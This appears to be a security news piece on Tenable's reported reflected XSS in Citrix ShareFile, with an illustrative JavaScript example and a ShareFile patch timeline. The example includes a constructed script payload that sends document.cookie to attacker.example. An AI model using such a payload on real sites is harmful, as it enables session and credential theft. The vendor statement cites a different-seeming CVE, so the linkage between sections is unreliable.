Tenable Research recently disclosed a vulnerability affecting Citrix ShareFile. The issue is a reflected cross-site scripting (XSS) flaw that could allow a malicious actor to steal login credentials or tokens, execute code in the context of a victim’s browser, or perform a variety of other malicious actions. Citrix has decided not to alert customers about the issue, at a time when ransomware gangs like CL0P are notorious for targeting file transfer applications.
Tenable Research recently disclosed the discovery of a vulnerability affecting Citrix ShareFile. If exploited, the reflected cross-site scripting vulnerability could have allowed a malicious actor to steal login credentials or tokens, execute code in the context of a victim’s browser, or perform a variety of other malicious actions.
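To make the bug class concrete, here is an added illustration written for this page; it is not ShareFile’s code and not the actual flaw Tenable reported, whose details the article does not give. It models a server-side template that reflects a hypothetical `file` query parameter into an HTML error message, first unescaped (the vulnerable form) and then HTML-encoded for the text context (the hardened form). The attacker payload is a constructed string of the kind a victim would receive in a crafted link.

```javascript
// Added example of reflected XSS: a page that echoes an untrusted request
// parameter back into HTML. Generic illustration only, not ShareFile code.

// Minimal HTML encoder for text nodes and double-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the hypothetical "file" parameter is concatenated into the
// markup verbatim, so markup in the parameter becomes markup in the page.
function renderNotFoundVulnerable(fileParam) {
  return `<p>No file named ${fileParam} was found.</p>`;
}

// Hardened: the same page, with the parameter encoded for the HTML text
// context before it is inserted.
function renderNotFoundSafe(fileParam) {
  return `<p>No file named ${escapeHtml(fileParam)} was found.</p>`;
}

// Crude stand-in for the browser's HTML parser: would the rendered page
// contain a <script> element that the attacker controls?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker input: runs in the victim's origin and ships the
// session cookie (or a token read from the DOM) to an attacker-controlled host.
const CONSTRUCTED_PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + encodeURIComponent(document.cookie))</script>';

// Renders both variants with the payload and reports whether each would
// execute attacker script.
function demo() {
  const vulnerable = renderNotFoundVulnerable(CONSTRUCTED_PAYLOAD);
  const safe = renderNotFoundSafe(CONSTRUCTED_PAYLOAD);
  return {
    vulnerableExecutes: containsScriptTag(vulnerable), // true
    safeExecutes: containsScriptTag(safe),             // false
    safeHtml: safe,
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

Output encoding must match the context the value lands in (text node, attribute, URL, or script); the encoder above covers text and quoted attributes only. A Content-Security-Policy without `unsafe-inline` and `HttpOnly` session cookies are defence in depth that limit what a payload like this can do, but they do not replace encoding at the sink.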
Despite the potential impact of the vulnerability, Citrix has elected not to publish information about the issue or to notify customers after patching it. Customers of cloud-hosted services are entirely beholden to the provider to fix reported issues and must trust blindly that proper care has gone into remediating them. This lack of transparency is a disservice to customers and leaves them in the dark about their exposure during the window before the patch was issued. Silent patching by cloud service providers hinders risk assessment and makes it harder for security teams to understand the risks in their cloud environments. Although a patch was issued, potentially affected customers may be unaware that any nefarious activity took place, and have no signal that they should look for it.
With ransomware groups like CL0P targeting file transfer applications, including Fortra’s GoAnywhere managed file transfer (MFT) and Progress Software’s MOVEit Transfer MFT software, securing these solutions and identifying potential avenues for exploitation is critical to staying a step ahead of opportunistic attackers.
David Le Strat, SVP Product & Technology at ShareFile, said: We have seen some inaccuracies in reporting of the above news related to the “ShareFile Vulnerability”, and want to ensure that the most up-to-date and accurate information is shared with regard to this vulnerability and ShareFile’s approach to assuring the safety of customers’ data.
See below a timeline of ShareFile’s response to this incident and accurate figures in regard to the impact on customers.
- A fix for CVE-2023-24489 was released on May 11, 2023 with Version 5.11.24 (one month before the security bulletin was issued).
- Customer patching was proactively handled and, by June 13, over 83% of these customers had patched their environments, before the incident was made public. Also, by June 13, all unpatched SZC hosts were blocked from connecting to the ShareFile cloud control plane, making unpatched SZC hosts unusable with ShareFile.
- On Aug. 16, CISA added the CVE to their known exploited vulnerability catalog; while there was a spike to 75 attacks following this, it died down immediately given that the issue has been addressed.
- When this vulnerability was discovered, we worked with and notified impacted customers in advance of the announced CVE to update to the latest version of our software to assure the safety of their data. Our control plane is no longer connected to any ShareFile StorageZones Controller (SZC) that is not patched.
- The incident affected less than 3% of our install base (2,800 customers).
- There is no known data theft from this incident.